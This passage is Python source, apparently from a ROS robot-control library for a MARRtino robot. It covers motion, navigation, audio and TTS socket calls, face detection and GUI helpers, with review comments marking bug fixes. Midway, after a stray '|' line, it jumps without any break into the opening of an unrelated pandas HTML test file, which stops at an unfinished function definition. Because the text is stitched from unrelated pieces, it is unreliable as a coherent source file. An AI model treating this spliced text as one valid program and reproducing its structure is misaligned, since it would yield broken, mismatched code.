    depth/IR/person/tag stream, or None when no suitable topic exists."""
    for topic_name, msg_type in rospy.get_published_topics():
        if msg_type != 'sensor_msgs/Image':
            continue
        if any(excl in topic_name for excl in ('depth', '/ir/', 'person', 'tag')):
            continue
        return topic_name
    return None
# Audio client
run_audio_connect = True     # loop guard for the connect thread
audio_connected = False      # True once the TCP connection is established

def audio_connect_thread():
    """Background thread: try to connect to the audio server, retrying
    once per second for up to 5 attempts.

    Bug fix: `audio_connected` was assigned without a `global` declaration,
    so the module-level flag never became True and begin() would spawn a
    fresh connect thread on every call even when already connected.
    """
    global run_audio_connect, assock, audio_connected
    print("Audio enabled, Connecting...")
    run_audio_connect = True
    timeout = 5
    while run_audio_connect and timeout>0:
        assock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            assock.connect((AUDIO_SERVER_IP, AUDIO_SERVER_PORT))
            print("Audio connected.")
            run_audio_connect = False
            audio_connected = True
        except:
            print("Cannot connect to audio server %s:%d" %(AUDIO_SERVER_IP, AUDIO_SERVER_PORT))
            time.sleep(1)
            timeout -= 1
    run_audio_connect = False
# Begin/end
def begin(nodename='robot_cmd', init_node=True):
    """Initialize the ROS node, publishers and subscribers.

    Idempotent: returns early when robot_initialized is already set.
    When audio is enabled and not yet connected, spawns the audio
    connection thread first.  Blocks up to ~5 s waiting for the first
    odometry pose.
    """
    global cmd_pub, des_cmd_pub, odom_sub, gt_sub, joints_pub, joy_sub, tag_sub, laser_sub, \
        sonar_sub_0, sonar_sub_1, sonar_sub_2, sonar_sub_3, \
        stage_say_pub, stage_setpose_pub, \
        odom_robot_pose, robot_initialized, stop_request, \
        use_robot, use_audio, audio_connected
    print('begin')
    stop_request = False
    if (use_audio and not audio_connected):
        # Run audio connection thread
        t = Thread(target=audio_connect_thread, args=())
        t.start()
        time.sleep(0.5)
    if (robot_initialized):
        return
    # blocking function if roscore not available !!!
    # does not throw exception
    if init_node:
        rospy.init_node(nodename, disable_signals=True)
    # AprilTag subscription only when the message type could be imported
    if AprilTagFound:
        tag_sub = rospy.Subscriber(TOPIC_tag_detections, AprilTagDetectionArray, tag_cb)
    laser_sub = rospy.Subscriber(TOPIC_scan, LaserScan, laser_cb)
    sonar_sub_0 = rospy.Subscriber(TOPIC_sonar_0, Range, sonar_cb)
    sonar_sub_1 = rospy.Subscriber(TOPIC_sonar_1, Range, sonar_cb)
    sonar_sub_2 = rospy.Subscriber(TOPIC_sonar_2, Range, sonar_cb)
    sonar_sub_3 = rospy.Subscriber(TOPIC_sonar_3, Range, sonar_cb)
    localizer_sub = rospy.Subscriber(TOPIC_amcl_pose, PoseWithCovarianceStamped, localizer_cb)
    joy_sub = rospy.Subscriber(TOPIC_joy, Joy, joy_cb)
    IMU_sub = rospy.Subscriber(TOPIC_IMU, Imu, IMU_cb)
    FIX_sub = rospy.Subscriber(TOPIC_FIX, NavSatFix, FIX_cb)
    MAG_sub = rospy.Subscriber(TOPIC_MAG, MagneticField, MAG_cb)
    ILL_sub = rospy.Subscriber(TOPIC_ILL, Illuminance, ILL_cb)
    if (use_robot):
        print("Robot enabled")
        cmd_pub = rospy.Publisher(TOPIC_cmd_vel, Twist, queue_size=1)
        des_cmd_pub = rospy.Publisher(TOPIC_desired_cmd_vel, Twist, queue_size=1)
        odom_sub = rospy.Subscriber(TOPIC_odom, Odometry, odom_cb)
        gt_sub = rospy.Subscriber(TOPIC_GROUND_TRUTH, Odometry, groundtruth_cb)
        joints_pub = rospy.Publisher(TOPIC_joints, JointJog, queue_size=1)
    # latched so late GUI subscribers still get the last message
    stage_setpose_pub = rospy.Publisher(TOPIC_SETPOSE, Pose, queue_size=1, latch=True)
    stage_say_pub = rospy.Publisher(TOPIC_STAGESAY, String, queue_size=1, latch=True)
    print("Waiting for robot pose... (5 seconds)")
    delay = 0.25 # sec
    rate = rospy.Rate(1/delay) # Hz
    try:
        rate.sleep()
        timeout = 5 #seconds
        # odom_robot_pose is filled by odom_cb once odometry arrives
        while (odom_robot_pose is None and timeout>0):
            rate.sleep()
            timeout -= delay
    except KeyboardInterrupt:
        pass
    if (odom_robot_pose is None):
        print("Robot pose not received. Using [0,0,0]")
        odom_robot_pose = [0,0,0] # default value
    robot_initialized = True
def end():
    """Shut the robot interface down; counterpart of begin().

    Stops motion (when the robot is enabled), raises stop_request so
    running control loops abort, and tears down the audio socket.
    """
    global robot_initialized, stop_request
    if not robot_initialized:
        return
    if (use_robot):
        stop()
    stop_request = True
    if (use_audio):
        global run_audio_connect, audio_connected
        run_audio_connect = False   # stop a still-running connect thread
        global assock
        if assock != None:
            assock.close()
            assock=None
        audio_connected = False
    try:
        rospy.sleep(0.5) # make sure stuff ends
    except:
        pass
    print('end')
# to unregister all the subscribers
def unregisterAll():
    """Placeholder: unregistering every subscriber is not implemented yet."""
    pass
sub_image = None  # active image Subscriber, or None

def startCameraGrabber():
    """Subscribe to an auto-detected camera topic and wait ~1 s for a frame."""
    global sub_image
    topic = autoImageTopic()
    if topic != None:
        print("Image topic: %s" %topic)
        sub_image = rospy.Subscriber(topic, Image, image_cb)
        time.sleep(1)

def stopCameraGrabber():
    """Unregister the image subscriber, if one is active."""
    global sub_image
    if sub_image != None:
        sub_image.unregister()
def getImage(tmsleep=3):
    """CamelCase alias of get_image(); returns the captured frame."""
    # BUG FIX: the captured image was computed but never returned
    return get_image(tmsleep)

def get_image(tmsleep=3):
    """Grab one camera frame, save it for the web viewer and the log, and
    return it as an OpenCV image (may be None if no frame arrived)."""
    global cvimage
    startCameraGrabber() # wait 1 sec for an image
    time.sleep(tmsleep)
    stopCameraGrabber()
    dateTimeObj = datetime.now()
    timestampStr = dateTimeObj.strftime("%Y%m%d-%H%M%S")
    cv2.imwrite(os.getenv('MARRTINO_APPS_HOME')+'/www/viewer/img/lastimage.jpg', cvimage)
    # NOTE(review): logdir is assumed to be a module-level directory path
    # defined earlier in the file — confirm it is always set before use
    cv2.imwrite('%s/%s.jpg' %(logdir,timestampStr), cvimage)
    return cvimage
def getWebImage(objcat=None):
    """CamelCase alias of get_web_image(); returns the fetched image."""
    # BUG FIX: the image was fetched but never returned
    return get_web_image(objcat)

def get_web_image(objcat=None):
    """Fetch an image via the webimages helper (optionally by object
    category), save it for the web viewer, and return it."""
    rchomelearnros_import()
    img = webimages.take_image(objcat)
    cv2.imwrite(os.getenv('MARRTINO_APPS_HOME')+'/www/viewer/img/lastimage.jpg', img)
    return img
# Haar detector
def findCascadeModel():
    """Locate and load the OpenCV frontal-face Haar cascade.

    Returns a cv2.CascadeClassifier, or None when no known install
    location contains the model file.
    """
    candidates = ['/usr/share/opencv/',
                  '/opt/ros/kinetic/share/OpenCV-3.3.1-dev/']
    for base in candidates:
        model = base + 'haarcascades/haarcascade_frontalface_default.xml'
        if os.path.isfile(model):
            return cv2.CascadeClassifier(model)
    return None
faceCascade = None  # lazily-loaded Haar cascade classifier

def faceDetection(img):
    """CamelCase alias of face_detection(); returns the face count."""
    # BUG FIX: the detection count was computed but never returned
    return face_detection(img)

def face_detection(img):
    """Count frontal faces in a BGR image.

    Returns the number of detections, or -1 when the Haar cascade model
    cannot be found on this system.
    """
    global faceCascade
    if faceCascade is None:
        faceCascade = findCascadeModel()
    if faceCascade is None:
        print("ERROR Cannot find Haar cascade model")
        return -1
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # Detect faces in the image
    faces = faceCascade.detectMultiScale(gray,
        scaleFactor=1.1,
        minNeighbors=5,
        minSize=(30, 30)
    )
    return len(faces)
# rc-home-learn-ros import
rchomelearnros_imported = False
mobilenet_objrec = None
webimages = None
def rchomelearnros_import():
    """Lazily locate and import the rc-home-edu-learn-ros vision helpers.

    Binds the module-level names mobilenet_objrec and webimages to the
    imported modules.  Safe to call repeatedly (no-op after success).
    """
    # NOTE(review): 'import mobilenet_objrec' under the global statement
    # rebinds the module-level name that the 'def mobilenet_objrec' below
    # also uses — after this runs, that function is shadowed by the
    # module.  Confirm whether that collision is intentional.
    global rchomelearnros_imported, mobilenet_objrec, webimages
    if rchomelearnros_imported:
        return
    path = None
    try:
        import rospkg
        # get an instance of RosPack with the default search paths
        rospack = rospkg.RosPack()
        # get the file path for rospy_tutorials
        path = rospack.get_path('rc-home-edu-learn-ros')
    except Exception as e:
        #print(e)
        # fall back to the conventional checkout location
        path = os.getenv('HOME')+'/src/rc-home-edu-learn-ros'
    print('rc-home-edu-learn-ros path: %s' %path)
    try:
        sys.path.append(path+'/rchomeedu_vision/scripts')
        import mobilenet_objrec, webimages
        rchomelearnros_imported = True
    except Exception as e:
        print(e)
        print('Cannot import mobilenet_objrec, webimages modules')
# Object recognition with mobilenet
monet = None  # lazily-created MNetObjRec instance
def mobilenetObjrec(img):
    """CamelCase alias: run MobileNet object recognition on an image."""
    # NOTE(review): this calls whatever 'mobilenet_objrec' is bound to at
    # call time — the function below, OR the module imported by
    # rchomelearnros_import(), which rebinds the same global name.
    # Verify which binding is intended; as written the two conflict.
    return mobilenet_objrec(img)
def mobilenet_objrec(img):
    """Run MobileNet object recognition on an OpenCV image.

    Returns the recognizer's result, or the string
    'ERROR Mobilenet not available' when the model cannot be loaded.
    """
    global monet
    if monet is None:
        rchomelearnros_import()
        try:
            # relies on rchomelearnros_import() having rebound the global
            # 'mobilenet_objrec' name to the imported module
            monet = mobilenet_objrec.MNetObjRec()
        except Exception as e:
            print(e)
            return 'ERROR Mobilenet not available'
    r = monet.evalCVImage(img)
    return r
def ready():
    """True once begin() has completed initialization."""
    return robot_initialized

# check if program can run now
def marrtino_ok():
    """snake_case alias of marrtinoOK()."""
    return marrtinoOK()

def marrtinoOK():
    """True while the program may keep controlling the robot."""
    return robot_initialized and not stop_request and not rospy.is_shutdown()
# Robot motion
def setSpeed(lx,az,tm,stopend=False):
    """CamelCase alias of set_speed()."""
    return set_speed(lx,az,tm,stopend)

def set_speed(lx,az,tm,stopend=False):
    """Publish a (lx, az) velocity command repeatedly for tm seconds.

    Publishes at 10 Hz on the desired-cmd_vel or cmd_vel topic depending
    on use_desired_cmd_vel.  When stopend is True, a zero command is sent
    at the end.  Returns False if interrupted (Ctrl-C or stop_request),
    True otherwise.  Raises when a non-zero command is issued while
    stop_request is set.
    """
    global cmd_pub, des_cmd_pub, use_desired_cmd_vel, stop_request, tv_good, rv_good
    if (stop_request and (lx!=0.0 or az!=0.0)):
        raise Exception("setSpeed called in stop_request mode")
    delay = 0.1 # sec
    rate = rospy.Rate(1/delay) # Hz
    cnt = 0.0
    msg = Twist()
    msg.linear.x = lx
    msg.angular.z = az
    msg.linear.y = msg.linear.z = msg.angular.x = msg.angular.y = 0
    # re-publish every cycle: many base drivers time out stale commands
    while not rospy.is_shutdown() and cnt<=tm and not stop_request:
        if (use_desired_cmd_vel):
            des_cmd_pub.publish(msg)
        else:
            cmd_pub.publish(msg)
        cnt = cnt + delay
        try:
            rate.sleep()
        except KeyboardInterrupt:
            print("User KeyboardInterrupt")
            return False
    if (stopend):
        msg.linear.x = 0
        msg.angular.z = 0
        cmd_pub.publish(msg)
        try:
            rate.sleep()
        except:
            pass
    return True
def setSpeed4W(fl,fr,bl,br,tm,stopend=False):
    """Drive the four wheels individually for tm seconds at 10 Hz.

    fl/fr/bl/br are per-wheel speeds, clamped to ±0.3 m/s and converted
    to JointJog velocities (note the per-side sign flips below).  When
    stopend is True a zero command is sent at the end.  Returns False on
    Ctrl-C, True otherwise.
    """
    vlimit = 0.3 # limit 0.3 m/s
    if math.fabs(fl)>vlimit:
        fl = fl / math.fabs(fl) * vlimit
    if math.fabs(fr)>vlimit:
        fr = fr / math.fabs(fr) * vlimit
    if math.fabs(bl)>vlimit:
        bl = bl / math.fabs(bl) * vlimit
    if math.fabs(br)>vlimit:
        br = br / math.fabs(br) * vlimit
    # 0.02 scale and alternating signs match the wheel joint conventions
    # of the driver — TODO confirm against the robot's URDF
    fln = - fl * 0.02
    frn = + fr * 0.02
    bln = + bl * 0.02
    brn = - br * 0.02
    cnt = 0.0
    delay = 0.1 # sec
    rate = rospy.Rate(1/delay) # Hz
    msg = JointJog()
    msg.joint_names = ["front_left_wheel", "front_right_wheel", "back_left_wheel", "back_right_wheel"]
    msg.velocities = [fln,frn,bln,brn]
    msg.duration = delay
    while not rospy.is_shutdown() and cnt<=tm and not stop_request:
        joints_pub.publish(msg)
        cnt = cnt + delay
        try:
            rate.sleep()
        except KeyboardInterrupt:
            return False
    if (stopend):
        msg.velocities = [0,0,0,0]
        joints_pub.publish(msg)
        try:
            rate.sleep()
        except:
            pass
    return True
def stop():
    """Halt all motion: cancel an active move_base goal, then zero both
    the differential and the four-wheel velocity commands."""
    global cmd_pub, joints_pub, move_base_running
    print('stop')
    if move_base_running:
        exec_movebase_stop()
    setSpeed(0, 0, 0.2, True)
    setSpeed4W(0, 0, 0, 0, 0.2, True)
def forward(r=1):
    """Move forward r * move_step meters."""
    print('forward %.2f' % r)
    return exec_move_REL(move_step * r)

def backward(r=1):
    """Move backward r * move_step meters."""
    print('backward %.2f' % r)
    return exec_move_REL(-move_step * r)

def left(r=1):
    """Turn left r * 90 degrees."""
    print('left %.2f' % r)
    return exec_turn_REL(90 * r)

def right(r=1):
    """Turn right r * 90 degrees."""
    print('right %.2f' % r)
    return exec_turn_REL(-90 * r)
# set stage pose
def stage_setpose(gx,gy,gth_deg):
    """Teleport the Stage-simulated robot to (gx, gy) with heading
    gth_deg degrees by publishing on the set-pose topic."""
    global stage_setpose_pub
    msg = Pose()
    msg.position.x = gx
    msg.position.y = gy
    msg.position.z = 0
    yaw = gth_deg * math.pi / 180.0
    quat = tf.transformations.quaternion_from_euler(0, 0, yaw)
    msg.orientation.x = quat[0]
    msg.orientation.y = quat[1]
    msg.orientation.z = quat[2]
    msg.orientation.w = quat[3]
    stage_setpose_pub.publish(msg)
# map frame goto (requires localization)
def goto(gx, gy, gth_deg):
    """Navigate to (gx, gy, gth_deg) in the map frame via move_base."""
    return exec_movebase(gx, gy, gth_deg)

def gotoPose(target_pose):
    """Navigate to a [x, y, th_deg] pose in the map frame."""
    return exec_movebase(target_pose[0], target_pose[1], target_pose[2])

def gotoLabel(target_label):
    """Navigate to a labeled pose stored on the parameter server
    (/map_server/<label>/gotopose); False when the label is unknown."""
    pname = "/map_server/%s/gotopose" %target_label
    if not rospy.has_param(pname):
        rospy.logerr("Label %s not found." %target_label)
        return False
    p = rospy.get_param(pname)
    return exec_movebase(p[0], p[1], p[2])
# odom frame direct control (no path planning)
def gotoTarget(gx, gy, frame='odom'):
    """Drive straight toward (gx, gy) in the given frame; True on success."""
    # BUG FIX: the success flag was dropped (inconsistent with goto())
    return goto_target(gx, gy, frame)

# odom frame direct control (no path planning)
def goto_target(gx, gy, frame='odom'):
    """snake_case alias of gotoTarget(); True on success."""
    # BUG FIX: propagate exec_goto_target's boolean result
    return exec_goto_target(gx, gy, frame)

# person follow
def start_follow_person(max_vel = 0.25): # non-blocking
    """Start the follow-person action (non-blocking)."""
    exec_follow_person_start(max_vel)

def stop_follow_person():
    """Cancel the follow-person action."""
    exec_follow_person_stop()
# Turn
def turn(deg, ref='REL', frame='odom'):
    """Rotate by deg degrees: relative (ref='REL', normalized to ±180)
    or to an absolute heading (any other ref)."""
    if ref == 'REL':
        deg = NORM_180(deg)
    print('turn %s %.2f frame %s' %(ref,deg,frame))
    return exec_turn_REL(deg, frame) if ref == 'REL' else exec_turn_ABS(deg, frame)
def dsleep(d):
    """Interruptible sleep of d seconds; False if the user hit Ctrl-C."""
    ok = True
    try:
        rospy.sleep(d)
    except KeyboardInterrupt:
        ok = False
    return ok
# Wait
def wait(r=1):
    """Sleep ~r seconds in 1-second slices, abortable via stop_request.

    Returns the result of the last dsleep() call (False when the sleep
    was interrupted by Ctrl-C).
    """
    global stop_request
    #print('wait %.1f' %r)
    if (r<=0):
        return dsleep(0.1)
    elif (r<1):
        return dsleep(r)
    else:
        t = 0
        e = True
        # sliced so a stop_request takes effect within ~1 s
        while t<r and not stop_request and e:
            d = min(1,r-t)
            e = dsleep(d)
            t += d
            print("wait ... %f < %f %r %r " %(t,r, stop_request, e))
        return e
# Sounds
def sound(name):
    """Ask the audio server to play a named sound (best-effort)."""
    global assock
    print('sound %s' %name)
    try:
        assock.send('SOUND %s\n\r' %name)
        time.sleep(0.5)
        reply = assock.recv(80)
        print(reply)
    except:
        # no audio connection: silently ignore
        pass
def bip(r=1):
    """Play the 'bip' sound r times."""
    for _ in range(r):
        sound('bip')

def bop(r=1):
    """Play the 'bop' sound r times."""
    for _ in range(r):
        sound('bop')

def boom(r=1):
    """Play the 'boom' sound r times."""
    for _ in range(r):
        sound('boom')
# TTS
def say(text, language='en'):
    """Speak text through the audio server TTS, mirroring it on the
    stage display while speaking (cleared afterwards)."""
    global assock
    print('say %s [%s]' %(text,language))
    locale = 'en-US' if language == 'en' else language + '-' + language.upper()
    stage_say(text)
    try:
        assock.send('TTS[%s] %s\n\r' %(locale,text))
        rospy.sleep(1)
        reply = assock.recv(80)
        print(reply)
    except:
        # no audio server: pause roughly as long as speaking would take
        rospy.sleep(3)
    stage_say("")

def stage_say(text, language='en'):
    """Publish text on the stage 'say' topic."""
    global stage_say_pub
    msg = String()
    msg.data = text
    stage_say_pub.publish(msg)
# ASR
def asr():
    """Poll the audio server for a speech-recognition result.

    Blocks (0.5 s polls) until a non-empty result arrives or
    stop_request is set; returns '' on error or stop.
    """
    global assock, stop_request
    try:
        result = ''
        while result == '' and not stop_request:
            assock.send('ASR\n\r') # ask for ASR results
            time.sleep(0.5)
            result = assock.recv(160).strip()
        return result
    except:
        return ''
# MODIM
mws = None # MODIM websocket connection
# Best-effort connection to the MODIM GUI: requires MODIM_HOME to be set
# and the ws_client module to be importable; otherwise mws stays None and
# the show_* helpers become no-ops.
try:
    sys.path.append(os.getenv('MODIM_HOME')+"/src/GUI")
    from ws_client import *
    mws = ModimWSClient()
except:
    print("No MODIM found!")
# example: show_image('red.jpg', 'default')
def showImage(value, which='default'):
    """CamelCase alias of show_image()."""
    show_image(value, which)

def show_image(value, which='default'):
    """Display img/<value> on the MODIM GUI modality image_<which>;
    no-op when MODIM is not connected."""
    global mws
    if mws != None:
        cstr = 'im.executeModality("image_%s", "img/%s")' %(which,value)
        reply = mws.csend(cstr)
        print(reply)

def showText(value, which='default'):
    """CamelCase alias of show_text()."""
    show_text(value, which)

def show_text(value, which='default'):
    """Show a text string on the MODIM GUI modality text_<which>;
    no-op when MODIM is not connected."""
    global mws
    if mws != None:
        cstr = 'im.executeModality("text_%s", "%s")' %(which,value)
        reply = mws.csend(cstr)
        print(reply)
# Precise move and turn
# Angle functions
def DEG2RAD(a):
    """Degrees to radians."""
    return a*math.pi/180.0

def RAD2DEG(a):
    """Radians to degrees."""
    return a/math.pi*180.0

def NORM_180(a):
    """Normalize an angle in degrees to (-180, 180]."""
    if a > 180:
        return a - 360
    if a < -180:
        return a + 360
    return a

def NORM_PI(a):
    """Normalize an angle in radians to (-pi, pi]."""
    if a > math.pi:
        return a - 2*math.pi
    if a < -math.pi:
        return a + 2*math.pi
    return a

def norm_target_angle(a):
    """Snap a (radians) to the nearest axis-aligned heading
    (0, pi/2, pi, -pi/2) when within 0.3 rad; otherwise return a."""
    snap_table = ((0.0, 0),
                  (math.pi/2.0, math.pi/2),
                  (math.pi, math.pi),
                  (3*math.pi/2.0, -math.pi/2))
    for ref, snapped in snap_table:
        if abs(NORM_PI(a - ref)) < 0.3:
            return snapped
    return a
def exec_turn_ABS(th_deg, frame='odom'):
    """Turn to the absolute heading th_deg (degrees) in the given frame,
    by converting it to a relative rotation."""
    pose = get_robot_pose(frame)
    delta_deg = NORM_180(th_deg - RAD2DEG(pose[2]))
    return exec_turn_REL(delta_deg, 'odom')
def exec_turn_REL(th_deg, frame='odom'):
    """Turn th_deg degrees relative to the current heading.

    Closed-loop: repeatedly commands an angular velocity (slowing down
    near the target, never below rv_min) until the remaining angle stops
    shrinking or falls under rv_min/8.  Returns False if canceled by the
    user, True otherwise.
    """
    global rv_good, rv_min
    robot_pose = get_robot_pose(frame)
    current_th = robot_pose[2]
    # snap near-axis targets so repeated 90° turns do not accumulate error
    target_th = norm_target_angle(current_th + DEG2RAD(th_deg))
    r = True
    rv_nom = rv_good
    if (th_deg < 0):
        rv_nom *= -1
    dth = abs(NORM_PI(target_th-current_th))
    last_dth = dth
    # stop when close enough OR when the error starts growing (overshoot)
    while (dth>rv_min/8.0 and last_dth>=dth):
        rv = rv_nom
        if (dth<0.8):
            # proportional slow-down in the last 0.8 rad
            rv = rv_nom*dth/0.8
        if (abs(rv)<rv_min):
            rv = rv_min*rv/abs(rv)
        tv = 0.0
        if setSpeed(tv, rv, 0.1, False):
            robot_pose = get_robot_pose(frame)
            current_th = robot_pose[2]
            dth = abs(NORM_PI(target_th-current_th))
            if (dth < last_dth or dth>0.3): # to avoid oscillation close to 0
                last_dth = dth
        else:
            print("turn action canceled by user")
            r = False
            dth=0
    setSpeed(0.0,0.0,0.1)
    return r
def exec_move_REL(tx, frame='odom'):
    """Move tx meters straight ahead (negative = backward).

    Closed-loop on traveled distance: commands a forward velocity that
    slows down in the last 0.5 m (never below tv_min) until within 0.1 m
    of the target.  Returns False if canceled by the user, True otherwise.
    """
    global tv_good
    robot_pose = get_robot_pose(frame)
    start_pose = list(robot_pose)
    tv_nom = tv_good
    r = True
    if (tx < 0):
        # drive backwards toward a positive distance target
        tv_nom *= -1
        tx *= -1
    dx = abs(distance(start_pose,robot_pose) - tx)
    while (dx>0.1):
        tv = tv_nom
        if (dx<0.5):
            # proportional slow-down in the last 0.5 m
            tv = tv_nom*dx/0.5
        if (abs(tv)<tv_min):
            tv = tv_min*tv/abs(tv)
        rv = 0.0
        if setSpeed(tv, rv, 0.1, False):
            robot_pose = get_robot_pose(frame)
            dx = abs(distance(start_pose, robot_pose) - tx)
        else:
            print("move action canceled by user")
            r = False
            dx = 0
    setSpeed(0.0,0.0,0.1)
    return r
def exec_goto_target(gx,gy, frame='odom'):
    """Drive directly toward (gx, gy) in the given frame (no planner).

    Simple pursuit controller: heads toward the goal, turning in place
    (tv = tv_min) when the heading error exceeds 0.8 rad, until within
    0.2 m.  Returns False if canceled by the user, True otherwise.
    """
    global tv_good, rv_good, tv_min, rv_min, odom_robot_pose, map_robot_pose
    robot_pose = get_robot_pose(frame)
    goal_pose = [gx,gy,0]
    r = True
    dx = distance(goal_pose,robot_pose)
    while (dx>0.2):
        tv = tv_good
        if (dx<0.5):
            # slow down when approaching the goal
            tv = tv*dx/0.5
        if (abs(tv)<tv_min):
            tv = tv_min*tv/abs(tv)
        current_th = robot_pose[2]
        th_goal = math.atan2(gy-robot_pose[1],gx-robot_pose[0])
        dth = NORM_PI(th_goal-current_th)
        if abs(dth)>0.1:
            # turn toward the goal heading
            rv = rv_good * dth/abs(dth)
        else:
            rv = 0
        if (abs(dth)>0.8):
            # large heading error: mostly rotate in place
            tv = tv_min
        if (abs(dth)<0.8):
            rv = rv*abs(dth)/0.8
        if (abs(rv)<rv_min and abs(rv)>0):
            rv = rv_min*rv/abs(rv)
        if setSpeed(tv, rv, 0.1, False):
            robot_pose = get_robot_pose(frame)
            dx = distance(goal_pose, robot_pose)
        else:
            r = False
            print("goto_target action canceled by user")
            dx = 0
    setSpeed(0.0,0.0,0.1)
    return r
def dist_from_goal():
    """Euclidean distance from the current pose to target_pose, or -1
    when no goal is active."""
    global target_pose
    if target_pose is None:
        return -1
    p = get_robot_pose()
    return math.sqrt(math.pow(p[0]-target_pose[0],2)+math.pow(p[1]-target_pose[1],2))
def start_movebase_pose(target_pose): # non-blocking
    """Send a move_base goal from a [x, y, th_deg] pose; True when sent."""
    # BUG FIX: start_movebase's success/failure result was dropped
    return start_movebase(target_pose[0], target_pose[1], target_pose[2])

def start_movebase(gx, gy, gth_deg): # non-blocking
    """Send a (gx, gy, gth_deg) map-frame goal to move_base.

    Lazily creates the action client.  Returns False when the move_base
    server cannot be reached, True once the goal has been sent.
    """
    global ac_movebase, move_base_running, target_pose
    if (ac_movebase == None):
        ac_movebase = actionlib.SimpleActionClient(ACTION_move_base,MoveBaseAction)
        timeout = rospy.Duration(5)
        if not ac_movebase.wait_for_server(timeout):
            print("ERROR start_movebase: Cannot connect with move_base server")
            return False
    target_pose = [gx, gy, gth_deg/180.0*math.pi]
    goal = MoveBaseGoal()
    goal.target_pose.header.frame_id = "map"
    goal.target_pose.header.stamp = rospy.Time.now()
    goal.target_pose.pose.position.x = gx
    goal.target_pose.pose.position.y = gy
    yaw = gth_deg/180.0*math.pi
    q = tf.transformations.quaternion_from_euler(0, 0, yaw)
    goal.target_pose.pose.orientation = Quaternion(q[0],q[1],q[2],q[3])
    ac_movebase.send_goal(goal)
    move_base_running = True
    print("move_base action started: target %r" %(target_pose))
    rospy.sleep(0.2)
    return True
def movebase_running():
    """True while a move_base goal is still executing (waits up to 1 s
    for a result); False when idle or interrupted."""
    global ac_movebase, move_base_running
    if not move_base_running:
        return False
    try:
        return not ac_movebase.wait_for_result(rospy.Duration(1))
    except KeyboardInterrupt:
        print("movebase action canceled by user")
        return False
def movebase_step(delay): # executes one move_base step of delay seconds
    # return [finish, success]
    # finish = True if action is terminated
    # success = True if goal has been reached
    """Sleep delay seconds, then inspect the move_base action state.

    Returns (finish, success).  A goal whose requested orientation is
    >= 999 is treated as "position only": it finishes as soon as the
    robot is within the planner's xy goal tolerance.
    """
    global ac_movebase, move_base_running, target_pose
    finish = False
    success = False
    rospy.sleep(delay)
    try:
        st = ac_movebase.get_state()
        # state 1: running, 3: succeed, 4: abort
        # read the active planner's goal tolerance (TrajectoryPlanner or
        # DWA), defaulting to 0.25 m when neither parameter is set
        if rospy.has_param('/move_base_node/TrajectoryPlannerROS/xy_goal_tolerance'):
            gt = rospy.get_param('/move_base_node/TrajectoryPlannerROS/xy_goal_tolerance')
        elif rospy.has_param('/move_base_node/DWAPlannerROS/xy_goal_tolerance'):
            gt = rospy.get_param('/move_base_node/DWAPlannerROS/xy_goal_tolerance')
        else:
            gt = 0.25
        if st==1 and target_pose[2]>=999 and dist_from_goal()<gt:
            print('Goal reached, ignoring orientation')
            finish = True
            success = True
        elif st==3:
            finish = True
            success = True
        elif st==4:
            finish = True
            success = False
    except KeyboardInterrupt:
        print("move_base action canceled by user")
        finish = True
        success = False
    if finish:
        print("move_base action finished. success: %r" %success)
    return (finish, success)
def exec_movebase(gx, gy, gth_deg): # blocking
    """Send a move_base goal and block until it finishes.

    Returns True when the goal was reached, False when sending failed or
    the action aborted.  Clears target_pose on exit.
    """
    global ac_movebase, move_base_running, target_pose
    r = start_movebase(gx, gy, gth_deg)
    if not r:
        return False
    success = True
    delay = 0.5
    while move_base_running:
        finish, success = movebase_step(delay)
        if finish: # action is terminated
            exec_movebase_stop()
            print('Move action completed. Success: %r' %success)
            move_base_running = False
    target_pose = None
    return success
def movebase_stop():
    """Alias of exec_movebase_stop()."""
    exec_movebase_stop()

def exec_movebase_stop():
    """Cancel all active move_base goals and clear the running state."""
    # BUG FIX: target_pose was missing from the global statement, so the
    # assignment below created a dead local and the module-level goal was
    # never cleared (dist_from_goal() kept reporting the stale goal).
    global ac_movebase, move_base_running, target_pose
    move_base_running = False
    target_pose = None
    if (ac_movebase == None):
        ac_movebase = actionlib.SimpleActionClient('move_base',MoveBaseAction)
        timeout = rospy.Duration(5)
        if not ac_movebase.wait_for_server(timeout):
            print("ERROR stop_movebase: Cannot connect with move_base server")
            return
    ac_movebase.cancel_all_goals()
ac_follow_person = None # action client
follow_person_running = False # running flag
PERSON_FOLLOW_ACTION = 'follow_person'

def exec_follow_person_start(max_vel):
    """Send a FollowPerson goal (non-blocking); no-op when the
    rococo_navigation action definitions are unavailable."""
    global ac_follow_person, follow_person_running
    if not rococo_navigation_Found:
        print("Action %s not available" %PERSON_FOLLOW_ACTION)
        return
    if ac_follow_person is None:
        ac_follow_person = actionlib.SimpleActionClient(PERSON_FOLLOW_ACTION,FollowPersonAction)
        print('Waiting for action server %s ...' %PERSON_FOLLOW_ACTION)
        ac_follow_person.wait_for_server()
        print('Done')
    goal = FollowPersonGoal()
    goal.person_id = 0  # unused so far
    goal.max_vel = max_vel  # m/s
    ac_follow_person.send_goal(goal)
    print("Follow person START")
    follow_person_running = True
def exec_follow_person_stop():
    """Cancel the FollowPerson action; no-op when the rococo_navigation
    action definitions are unavailable."""
    global ac_follow_person, follow_person_running
    if not rococo_navigation_Found:
        print("Action %s not available" %PERSON_FOLLOW_ACTION)
        return
    if ac_follow_person is None:
        ac_follow_person = actionlib.SimpleActionClient(PERSON_FOLLOW_ACTION,FollowPersonAction)
        print('Waiting for action server %s ...' %PERSON_FOLLOW_ACTION)
        ac_follow_person.wait_for_server()
        print('Done')
    ac_follow_person.cancel_all_goals()
    print("Follow person STOP")
    follow_person_running = False
|
test_html.py | from __future__ import print_function
import os
import re
import threading
from functools import partial
import pytest
import numpy as np
from numpy.random import rand
from pandas import (DataFrame, MultiIndex, read_csv, Timestamp, Index,
date_range, Series)
from pandas.compat import (map, zip, StringIO, BytesIO,
is_platform_windows, PY3, reload)
from pandas.errors import ParserError
from pandas.io.common import URLError, file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
import pandas.util.testing as tm
import pandas.util._test_decorators as td
from pandas.util.testing import makeCustomDataframe as mkdf, network
HERE = os.path.dirname(__file__)
# each param is a file in io/data/html_encoding exercising one encoding
@pytest.fixture(params=[
    'chinese_utf-16.html',
    'chinese_utf-32.html',
    'chinese_utf-8.html',
    'letz_latin1.html',
])
def html_encoding_file(request, datapath):
    """Parametrized fixture for HTML encoding test filenames."""
    return datapath('io', 'data', 'html_encoding', request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
